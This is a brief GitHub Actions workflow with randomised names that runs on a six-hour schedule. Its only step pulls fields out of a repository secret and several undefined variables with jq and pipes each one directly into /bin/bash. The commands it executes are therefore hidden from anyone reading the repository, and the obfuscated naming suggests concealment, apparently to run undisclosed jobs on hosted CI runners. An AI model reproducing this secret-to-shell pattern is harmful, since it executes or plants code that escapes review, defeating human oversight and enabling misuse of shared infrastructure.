name: laicongchu
on:
  workflow_dispatch:
  schedule:
    - cron: '32 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laicongchu
        env:
          ndgu330: ${{ secrets.ndgu330 }}
        run: |
          echo $ndgu330 | jq -r .flzm4 | /bin/bash
          echo $cb0 | jq -r .jymt230 | /bin/bash
          echo $yxhw9 | jq -r .cn11206 | /bin/bash
          echo $fmfmk8199 | jq -r .tqxpn3410 | /bin/bash
          echo $v16871 | jq -r .gry41904 | /bin/bash
          echo $jp7 | jq -r .rhruu40 | /bin/bash
          echo $mv7177 | jq -r .uehx67792 | /bin/bash
          echo $mg9 | jq -r .uf7127 | /bin/bash

